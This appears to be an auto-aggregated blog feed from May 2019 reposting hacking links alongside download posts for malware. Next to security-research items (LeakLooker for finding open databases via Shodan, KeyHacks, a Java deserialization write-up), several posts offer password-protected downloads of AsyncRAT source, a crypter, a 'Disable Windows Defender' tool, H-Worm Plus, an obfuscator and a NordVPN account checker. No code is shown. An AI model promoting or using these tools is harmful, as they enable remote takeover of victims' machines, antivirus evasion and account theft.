понеделник, 27 май 2019 г.

woj-ciech/LeakLooker ↳ http://bit.ly/2H2dZnR LeakLooker Find open databases with...

woj-ciech/LeakLooker

https://github.com/woj-ciech/LeakLooker

LeakLooker Find open databases with Shodan Background: https://medium.com/@woj_ciech/leaklooker-find-open-databases-in-a-second-9da4249c8472 Requirements: Python 3 Shodan paid plan, except Kibana search Put your Shodan API key in line 65 pip3 install shodan pip3 install colorama pip3 install hurry….



from Hack+ http://bit.ly/2K38Lbe
via IFTTT

неделя, 26 май 2019 г.

AsyncRAT v0.4.9D (SRC) By NYAN CAT

DOWNLOAD PASS = tr
» Informações:

» CSharp: AsyncRAT v0.4.9D
» Tamanho: 4,58 MB ::.
» Data da Criação: 25/05/2019 [18:02]











from Connect Trojan http://bit.ly/2W5JQec
via IFTTT

петък, 24 май 2019 г.

wcventure/FuzzingPaper ↳ http://bit.ly/2QotHuC Abstract: Side-channel attacks...

wcventure/FuzzingPaper

https://github.com/wcventure/FuzzingPaper

Abstract: Side-channel attacks allow an adversary to uncover secret program data by observing the behavior of a program with respect to a resource, such as execution time, consumed memory or response size….



from Hack+ http://bit.ly/2M7V5OY
via IFTTT

четвъртък, 23 май 2019 г.

CodeDOM Crypter Easy Storage (SRC) By StarZ

DOWNLOAD PASS = tr
» Informações:

» CSharp: CodeDOM Crypter Easy Storage
» Tamanho: 46,8 KB ::.
» Data da Criação: 08/11/2018 [22:06]











from Connect Trojan http://bit.ly/2Hyz4V9
via IFTTT

вторник, 21 май 2019 г.

Disable Windows Defender v1.1 [Permanently Disabled] (SRC) By NYAN CAT

DOWNLOAD PASS = tr
» Informações:

» CSharp: Disable Windows Defender v1.1
» Tamanho: 16,1 KB ::.
» Data da Criação: 20/05/2019 [10:45]










from Connect Trojan http://bit.ly/2YCMWmR
via IFTTT

петък, 17 май 2019 г.

streaak/keyhacks ↳ http://bit.ly/2VKmBWV KeyHacks shows...

streaak/keyhacks

https://github.com/streaak/keyhacks#AWS-Access-Key-ID-and-Secret

KeyHacks shows ways in which particular API keys found on a Bug Bounty Program can be used, to check if they are valid. If the below command returns missing_text_or_fallback_or_attachments, it means that the URL is valid, any other responses would mean that the URL is invalid….



from Hack+ http://bit.ly/2LR3vdq
via IFTTT

Blind Java Deserialization Vulnerability - Commons Gadgets ↳...

Blind Java Deserialization Vulnerability - Commons Gadgets

https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html

TL;DR: Exploitation of Java Deserialization vulnerability in restricted environments (firewalled system, updated Java). Technique similar to blind SQL injection enables to extract data from the target system (read files, properties, env vars)….



from Hack+ http://bit.ly/2WafiHF
via IFTTT

сряда, 8 май 2019 г.

NordVPN Checker by xRisky v2

DOWNLOAD PASS = tr
» Informações:

» Programa: NordVPN Checker v2
» Tamanho: 3,18 MB ::.
» Data da Criação: 03/05/2019 [17:08]










from Connect Trojan http://bit.ly/2PQxxwf
via IFTTT

неделя, 5 май 2019 г.

.Net Free Obfuscator [Protect Exe & Dll]

DOWNLOAD PASS = tr
» Informações:

» WebSite: .Net Free Obfuscator
» Tamanho: 00,00 KB ::.
» Data da Criação: 00/00/0000 [00:00]











from Connect Trojan http://bit.ly/2PKsOw3
via IFTTT

сряда, 1 май 2019 г.

H Worm Plus v1.2 Coder H O U D I N I - Legends DeveloPer

DOWNLOAD PASS = tr
» Informações:

» Programa: H Worm Plus v1.2 - Legends DeveloPer
» Tamanho: 2,24 MB ::.
» Data da Criação: 26/04/2019 [17:54]











from Connect Trojan http://bit.ly/2Wl5xDi
via IFTTT

H-Worm Plus - Execute in PowerShell By Brilliant Attack

DOWNLOAD PASS = tr
» Informações:

» VBScript: H-Worm Plus - Execute in PowerShell
» Tamanho: 00,00 KB ::.
» Data da Criação: 00/00/0000 [00:00]










from Connect Trojan http://bit.ly/2VASC2Z
via IFTTT